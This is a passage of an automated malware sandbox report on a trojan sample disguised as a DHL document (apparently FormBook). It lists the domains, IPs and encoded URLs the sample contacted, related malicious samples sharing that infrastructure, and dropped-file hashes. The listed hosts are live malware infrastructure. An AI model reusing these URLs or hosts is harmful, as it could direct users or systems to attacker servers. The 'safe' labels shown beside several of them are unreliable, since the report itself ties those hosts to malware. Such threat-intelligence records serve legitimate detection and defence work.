http://www.premium303max.rest/4sq5/?NbcPAHe=auinYk/N7fzuxFx4AOK1CjEJadf5mPDXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFBIBrVLT/+01tRxGHQ8IXkE2JVGDAaEVlxk=&9Pj=rz_D	0%	Avira URL Cloud	safe
http://www.treatyourownhip.online/pq4g/?9Pj=rz_D&NbcPAHe=/x7ZrZ76GI+PVQIB/efztiEAQuNtkt0VDZRMpFR2TevR7yRDJNTVJQ5a4wLIxcipLtxsrpwhId74rtIBLdbLD8HSA5zGxCmzJwIJ9T37OSxmELpXH1Ey3c0=	0%	Avira URL Cloud	safe
http://www.gold-rates.online/026w/	0%	Avira URL Cloud	safe
http://www.loginov.enterprises/b8ns/?9Pj=rz_D&NbcPAHe=AHsT2lQM7afkvhgoTXaEPozK6vnsC2K6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0oJQYSGbyxd1Ea4wpo/x7IHrd/aWl4Cajac=	0%	Avira URL Cloud	safe
http://www.2925588.com/1t94/	0%	Avira URL Cloud	safe
http://www.broork.sbs/mivl/?NbcPAHe=NCBdkbAo51Pk6OQBAnBxM8uFnkri8kZDRfsqOlllsQkjLkqguOrgRg1KSY2RNLpxIpBa/WYuubaTkbJsfRdnK/ix96hDlK/5VhHaQOJqN2apQeXMRtfwTm8=&9Pj=rz_D	0%	Avira URL Cloud	safe
http://www.premium303max.rest/4sq5/	0%	Avira URL Cloud	safe
http://www.2925588.com/1t94/?NbcPAHe=gjMIJwSCW/9UgfmAMdvHIdsDY5AHUjjwxiwa2AwzMfTndCXl3IsTOH3xQbqTIzs3KmqJPz6XjFO/L3LQlwMgjcwSF2JZ6IaX0a+FZ1WtU911G5wO/kltYUU=&9Pj=rz_D	0%	Avira URL Cloud	safe
http://www.nutrigenfit.online/uye5/	0%	Avira URL Cloud	safe
http://www.plyvik.info/ak8m/	0%	Avira URL Cloud	safe
http://www.nutrigenfit.online/uye5/?9Pj=rz_D&NbcPAHe=75F1ULhw6FwEjpnAOUSbF21mK8NkBCS+6cO+diyrF+sYFY6hrAWtaaFZiFMruwmlEHMkL4DDBtvLLE4rNUa6rLiKH/gwOIhUvbn1b/q8x18okz/4WQ7XajQ=	0%	Avira URL Cloud	safe
http://www.broork.sbs/mivl/	0%	Avira URL Cloud	safe
http://www.adsdomain-195.click/xene/	0%	Avira URL Cloud	safe
http://www.68529.xyz/2su7/	0%	Avira URL Cloud	safe
http://www.treatyourownhip.online/pq4g/	0%	Avira URL Cloud	safe
http://www.loginov.enterprises/b8ns/	0%	Avira URL Cloud	safe
http://www.plyvik.info/ak8m/?NbcPAHe=rnlDhCsdJ2ooBNmS/2ryiUnDiA99hEPBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQmTcYjl3T3IxdHP3y6mI4eFVbYE62DRlQ7k=&9Pj=rz_D	0%	Avira URL Cloud	safe
http://www.68529.xyz	0%	Avira URL Cloud	safe
http://premium303max.rest/4sq5/?NbcPAHe=auinYk/N7fzuxFx4AOK1CjEJadf5mPDXxmAc	0%	Avira URL Cloud	safe
http://www.adsdomain-195.click/xene/?9Pj=rz_D&NbcPAHe=oQfmtMAR504qWoErGCutl7x0yVR6q2g71CN+h8gaaxvvjR4IOOhM8LL7s1MwTzNJoD6YjSoePunXYwEMUYhUEqUzXVZ73JGOh0p0dB8KyypZzDeumOcFOmM=	0%	Avira URL Cloud	safe
https://parking.reg.ru/script/get_domain_data?domain_name=www.dpo-medicina.online&rand=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
treatyourownhip.online	81.169.145.95	true	false	unknown
www.dpo-medicina.online	194.58.112.174	true	false	unknown
loginov.enterprises	3.33.130.190	true	false	unknown
www.premium303max.rest	45.79.252.94	true	false	unknown
www.2925588.com	103.71.154.12	true	false	unknown
www.gold-rates.online	199.59.243.227	true	false	unknown
www.broork.sbs	163.44.176.12	true	false	unknown
www.68529.xyz	107.163.130.253	true	true	unknown
nutrigenfit.online	195.110.124.133	true	false	unknown
www.plyvik.info	67.223.117.142	true	false	unknown
www.adsdomain-195.click	199.59.243.227	true	false	unknown
www.treatyourownhip.online	unknown	unknown	false	unknown
www.loginov.enterprises	unknown	unknown	false	unknown
www.nutrigenfit.online	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.loginov.enterprises/b8ns/?9Pj=rz_D&NbcPAHe=AHsT2lQM7afkvhgoTXaEPozK6vnsC2K6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0oJQYSGbyxd1Ea4wpo/x7IHrd/aWl4Cajac=	false	Avira URL Cloud: safe	unknown
http://www.nutrigenfit.online/uye5/	false	Avira URL Cloud: safe	unknown
http://www.premium303max.rest/4sq5/	false	Avira URL Cloud: safe	unknown
http://www.premium303max.rest/4sq5/?NbcPAHe=auinYk/N7fzuxFx4AOK1CjEJadf5mPDXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFBIBrVLT/+01tRxGHQ8IXkE2JVGDAaEVlxk=&9Pj=rz_D	false	Avira URL Cloud: safe	unknown
http://www.plyvik.info/ak8m/	false	Avira URL Cloud: safe	unknown
http://www.gold-rates.online/026w/	false	Avira URL Cloud: safe	unknown
http://www.2925588.com/1t94/?NbcPAHe=gjMIJwSCW/9UgfmAMdvHIdsDY5AHUjjwxiwa2AwzMfTndCXl3IsTOH3xQbqTIzs3KmqJPz6XjFO/L3LQlwMgjcwSF2JZ6IaX0a+FZ1WtU911G5wO/kltYUU=&9Pj=rz_D	false	Avira URL Cloud: safe	unknown
http://www.broork.sbs/mivl/?NbcPAHe=NCBdkbAo51Pk6OQBAnBxM8uFnkri8kZDRfsqOlllsQkjLkqguOrgRg1KSY2RNLpxIpBa/WYuubaTkbJsfRdnK/ix96hDlK/5VhHaQOJqN2apQeXMRtfwTm8=&9Pj=rz_D	false	Avira URL Cloud: safe	unknown
http://www.treatyourownhip.online/pq4g/?9Pj=rz_D&NbcPAHe=/x7ZrZ76GI+PVQIB/efztiEAQuNtkt0VDZRMpFR2TevR7yRDJNTVJQ5a4wLIxcipLtxsrpwhId74rtIBLdbLD8HSA5zGxCmzJwIJ9T37OSxmELpXH1Ey3c0=	false	Avira URL Cloud: safe	unknown
http://www.2925588.com/1t94/	false	Avira URL Cloud: safe	unknown
http://www.nutrigenfit.online/uye5/?9Pj=rz_D&NbcPAHe=75F1ULhw6FwEjpnAOUSbF21mK8NkBCS+6cO+diyrF+sYFY6hrAWtaaFZiFMruwmlEHMkL4DDBtvLLE4rNUa6rLiKH/gwOIhUvbn1b/q8x18okz/4WQ7XajQ=	false	Avira URL Cloud: safe	unknown
http://www.adsdomain-195.click/xene/	false	Avira URL Cloud: safe	unknown
http://www.broork.sbs/mivl/	false	Avira URL Cloud: safe	unknown
http://www.loginov.enterprises/b8ns/	false	Avira URL Cloud: safe	unknown
http://www.68529.xyz/2su7/	false	Avira URL Cloud: safe	unknown
http://www.treatyourownhip.online/pq4g/	false	Avira URL Cloud: safe	unknown
http://www.plyvik.info/ak8m/?NbcPAHe=rnlDhCsdJ2ooBNmS/2ryiUnDiA99hEPBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQmTcYjl3T3IxdHP3y6mI4eFVbYE62DRlQ7k=&9Pj=rz_D	false	Avira URL Cloud: safe	unknown
http://www.adsdomain-195.click/xene/?9Pj=rz_D&NbcPAHe=oQfmtMAR504qWoErGCutl7x0yVR6q2g71CN+h8gaaxvvjR4IOOhM8LL7s1MwTzNJoD6YjSoePunXYwEMUYhUEqUzXVZ73JGOh0p0dB8KyypZzDeumOcFOmM=	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reg.ru	AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.reg.ru/domain/new/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_	AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.reg.ru/dedicated/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_l	AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	AtBroker.exe, 00000004.00000002.3566599950.0000000006150000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3568220560.0000000007E40000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.3566599950.0000000005976000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003596000.00000004.00000001.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003D70000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.reg.ru/whois/?check=&dname=www.dpo-medicina.online&reg_source=parking_auto	AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	false		high
https://www.reg.ru/hosting/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_lan	AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	false		high
http://www.68529.xyz	hubOySeXSAbhw.exe, 00000007.00000002.3567573313.00000000054D1000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.reg.ru/sozdanie-saita/	AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	false		high
http://premium303max.rest/4sq5/?NbcPAHe=auinYk/N7fzuxFx4AOK1CjEJadf5mPDXxmAc	AtBroker.exe, 00000004.00000002.3566599950.0000000005FBE000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003BDE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	AtBroker.exe, 00000004.00000003.2185544686.000000000819D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://parking.reg.ru/script/get_domain_data?domain_name=www.dpo-medicina.online&rand=	AtBroker.exe, 00000004.00000002.3566599950.00000000057E4000.00000004.10000000.00040000.00000000.sdmp, hubOySeXSAbhw.exe, 00000007.00000002.3566096015.0000000003404000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2289880564.000000001C5D4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
67.223.117.142	www.plyvik.info	United States	15189	VIMRO-AS15189US	false
45.79.252.94	www.premium303max.rest	United States	63949	LINODE-APLinodeLLCUS	false
163.44.176.12	www.broork.sbs	Japan	7506	INTERQGMOInternetIncJP	false
81.169.145.95	treatyourownhip.online	Germany	6724	STRATOSTRATOAGDE	false
195.110.124.133	nutrigenfit.online	Italy	39729	REGISTER-ASIT	false
199.59.243.227	www.gold-rates.online	United States	395082	BODIS-NJUS	false
103.71.154.12	www.2925588.com	Hong Kong	132325	LEMON-AS-APLEMONTELECOMMUNICATIONSLIMITEDHK	false
194.58.112.174	www.dpo-medicina.online	Russian Federation	197695	AS-REGRU	false
107.163.130.253	www.68529.xyz	United States	20248	TAKE2US	true
3.33.130.190	loginov.enterprises	United States	8987	AMAZONEXPANSIONGB	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1550802
Start date and time:	2024-11-07 08:07:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL_doc.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@11/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 42 Number of non-executed functions: 307
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
02:09:44	API Interceptor	6624130x Sleep call for process: AtBroker.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
67.223.117.142	SecuriteInfo.com.FileRepMalware.20173.21714.exe	Get hash	malicious	FormBook	Browse	www.plyvik.info/yhso/
67.223.117.142	INVOICES.exe	Get hash	malicious	FormBook	Browse	www.plyvik.info/ak8m/
45.79.252.94	INVOICES.exe	Get hash	malicious	FormBook	Browse	www.premium303max.rest/4sq5/
163.44.176.12	IMPORT PERMITS.exe	Get hash	malicious	FormBook	Browse	www.broork.sbs/51fd/
	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	www.broork.sbs/51fd/
	INVOICES.exe	Get hash	malicious	FormBook	Browse	www.broork.sbs/mivl/
81.169.145.95	INVOICES.exe	Get hash	malicious	FormBook	Browse	www.treatyourownhip.online/pq4g/
	LlbpXphTu9.exe	Get hash	malicious	Unknown	Browse	www.treatyourownhip.online/k7fo/
	WvwNJkZ8jcQuUnb.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.hasenkamp.dev/cn26/?tFQt-Vx=V/Q+AkmkARTPGxAlDCgtsOI3MUO8Oc3kQ/EbPJKjUA6/hLSnxMTIt5W+tdpy91ahhBrO&CTp0R=cvKXnTUHWxJHefS
	order_2393.doc	Get hash	malicious	Unknown	Browse	www.ofenrohr-thermometer.de/u5y432/h54f3.exe
	Dbo6LDXglX.exe	Get hash	malicious	FormBook	Browse	www.atocuisine.com/tnq3/?Ipph8=ipJpBwjJYnn7fmRH+s3SH2iXu4oUEaEXuph1JdP5Vp5a5Oaw1QxGNVakHWSWV2rO8M7il8e3AS+056pe7zwqIROfcMlLKZQwln2pfB5Il8GK&g6=f2JHt6nHvrxl-4
	PO#006503.pdf.exe	Get hash	malicious	FormBook	Browse	www.thelousciouscocoon.com/nid3/?LDHT9bPx=kcSA6cNVSfzORzjXn3oPlElLOQqh4SHXbbwBcaqpFhTa+fuxel8slOskZBJjqKYIfld0&fFN=1bitK4v0
195.110.124.133	INVOICE_PO# PUO202300054520249400661.exe	Get hash	malicious	FormBook	Browse	www.nutrigenfit.online/2vhi/
	56ck70s0BI.exe	Get hash	malicious	FormBook	Browse	www.nidedabeille.net/oy0l/
	p4rsJEIb7k.exe	Get hash	malicious	FormBook	Browse	www.nidedabeille.net/oy0l/?uXP=1HX8&Q2_4=vcWw5DdjdQnkJmRMu9Bv0nYhxIjg8XNP87kLKcEwcjL/VJXYlRnLhwXYdIbeiM5Wp1LHJGQmwLmzd8N63pnOImbiL9MWYGLhlQi4+Y3hzWOb/gf9Ze4XcY0=
	IMPORT PERMITS.exe	Get hash	malicious	FormBook	Browse	www.nutrigenfit.online/uhg3/
	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	www.nutrigenfit.online/uhg3/
	HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe	Get hash	malicious	FormBook	Browse	www.nutrigenfit.online/2vhi/
	Viridine84.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.nidedabeille.net/qkk1/
	INVOICES.exe	Get hash	malicious	FormBook	Browse	www.nutrigenfit.online/uye5/
	rpurchasyinquiry.exe	Get hash	malicious	FormBook	Browse	www.nutrigenfit.online/938r/
	OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exe	Get hash	malicious	FormBook	Browse	www.nutrigenfit.online/2vhi/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.premium303max.rest	INVOICES.exe	Get hash	malicious	FormBook	Browse	45.79.252.94
www.68529.xyz	INVOICES.exe	Get hash	malicious	FormBook	Browse	107.163.130.253
www.broork.sbs	IMPORT PERMITS.exe	Get hash	malicious	FormBook	Browse	163.44.176.12
	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	163.44.176.12
	INVOICES.exe	Get hash	malicious	FormBook	Browse	163.44.176.12
www.gold-rates.online	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.227
	INVOICES.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	rpurchasyinquiry.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	zamowienie.exe	Get hash	malicious	GuLoader	Browse	199.59.243.227
www.dpo-medicina.online	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	194.58.112.174
	INVOICES.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	PR. No.1599-Rev.2.exe	Get hash	malicious	Unknown	Browse	194.58.112.174
www.2925588.com	IbRV4I7MrS.exe	Get hash	malicious	FormBook	Browse	103.71.154.12
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	103.71.154.12
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	103.71.154.12
	INVOICES.exe	Get hash	malicious	FormBook	Browse	103.71.154.12
	LlbpXphTu9.exe	Get hash	malicious	Unknown	Browse	103.71.154.12
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	103.71.154.12

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
REGISTER-ASIT	INVOICE_PO# PUO202300054520249400661.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	56ck70s0BI.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	p4rsJEIb7k.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	IMPORT PERMITS.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.88.48.71
	Viridine84.exe	Get hash	malicious	FormBook, GuLoader	Browse	195.110.124.133
	INVOICES.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	rpurchasyinquiry.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
INTERQGMOInternetIncJP	r6lOHDg9N9.exe	Get hash	malicious	FormBook	Browse	133.130.35.90
	SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exe	Get hash	malicious	FormBook	Browse	150.95.254.16
	debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	Get hash	malicious	FormBook	Browse	150.95.254.16
	IMPORT PERMITS.exe	Get hash	malicious	FormBook	Browse	163.44.176.12
	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	163.44.176.12
	http://3d1.gmobb.jp/dcm299ccyag4e/gov/	Get hash	malicious	Phisher	Browse	133.130.64.224
	INVOICES.exe	Get hash	malicious	FormBook	Browse	163.44.176.12
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	118.27.39.62
	splarm.elf	Get hash	malicious	Unknown	Browse	133.130.30.78
	ppc.elf	Get hash	malicious	Unknown	Browse	150.95.219.226
VIMRO-AS15189US	icRicpJWczmiOf8.exe	Get hash	malicious	FormBook	Browse	67.223.118.17
	SecuriteInfo.com.FileRepMalware.20173.21714.exe	Get hash	malicious	FormBook	Browse	67.223.117.142
	INVOICES.exe	Get hash	malicious	FormBook	Browse	67.223.117.142
	QUOTE2342534.exe	Get hash	malicious	FormBook	Browse	67.223.117.169
	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	67.223.117.189
	PO#001498.exe	Get hash	malicious	FormBook	Browse	67.223.117.169
	w64HYOhfv1.exe	Get hash	malicious	FormBook	Browse	67.223.117.189
	enkJ6J7dAn.exe	Get hash	malicious	FormBook	Browse	67.223.117.189
	yakov.arm7.elf	Get hash	malicious	Mirai	Browse	208.85.174.50
	PO#001498.exe	Get hash	malicious	FormBook	Browse	67.223.117.169
STRATOSTRATOAGDE	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	85.214.228.140
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	85.214.228.140
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	85.214.228.140
	https://hidrive.ionos.com/lnk/FamigcCEF	Get hash	malicious	Unknown	Browse	85.214.3.95
	LJSS65p4Kz.elf	Get hash	malicious	Unknown	Browse	85.215.233.6
	belks.spc.elf	Get hash	malicious	Mirai	Browse	85.214.83.154
	https://get.hidrive.com/api/ZVDVVnH5/file/fgWacQquUMk6LQc3wqBJEz	Get hash	malicious	Unknown	Browse	85.214.3.151
	INVOICES.exe	Get hash	malicious	FormBook	Browse	81.169.145.95
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	85.214.228.140
	SetupRST.exe	Get hash	malicious	Unknown	Browse	85.214.228.140
LINODE-APLinodeLLCUS	sDX1AXN1Zp.elf	Get hash	malicious	Mirai, Moobot	Browse	212.71.245.12
	https://www.usatraveldocs.com/in	Get hash	malicious	Unknown	Browse	45.33.30.197
	update.hta	Get hash	malicious	Cobalt Strike, Sliver	Browse	23.239.28.166
	SecuriteInfo.com.FileRepMalware.20173.21714.exe	Get hash	malicious	FormBook	Browse	178.79.184.196
	5WP9WCM8qV.exe	Get hash	malicious	GuLoader	Browse	45.33.20.235
	5WP9WCM8qV.exe	Get hash	malicious	GuLoader	Browse	45.33.18.44
	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse	45.33.2.79
	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse	45.56.79.23
	https://www.google.lu/url?q=dK5oN8bP2yJ1vL3qF6gT0cR9mW4sH7jD2uY8kX5zM0nW4rT9pB6yG3lF1oJ8qV2kN7dP5uC3xH6tR0jL4wY1vS9mD2bT8nK7yX5rJ3qG0sW6lP9oF2aH1kpQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&esrc=026rlFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bgalapagos%C2%ADhostal%C2%AD%C2%ADtintorera%C2%AD.com%2Fauoth%2Fmeme%2Fnexpoint.com/c2pvaG5zb25AbmV4cG9pbnQuY29t	Get hash	malicious	Mamba2FA	Browse	66.228.61.234
	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	45.33.30.197

Process:	C:\Windows\SysWOW64\AtBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\subpredication

Download File

Process:	C:\Users\user\Desktop\DHL_doc.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.989859407343739
Encrypted:	false
SSDEEP:	3072:MCF3vLKfcKyFWTzsCa1WEJ9sUaUtpi2GWLmcudfZ19fuZuOeV36wa5BiML+xzWAq:Je0JWTICE7tvWBh6weBiMLwZugcipzs
MD5:	451DF4C6C53DA9C302D4370A9BB85F56
SHA1:	7D28D57D823ADDB622CEBD0065422CB983F057E7
SHA-256:	357D11D9D026E543CCCEE8F86917908E6EB1D593C1047E88961E4A8D8D142AB4
SHA-512:	11A9DD10B375F21D6267B22534A27DBBBC9B136E1358C30F69D4A4ED3E2197162DA7E379AEBC990A597E9852F2B3A373385C0E267352A4D3844EAD5732AED905
Malicious:	false
Reputation:	low
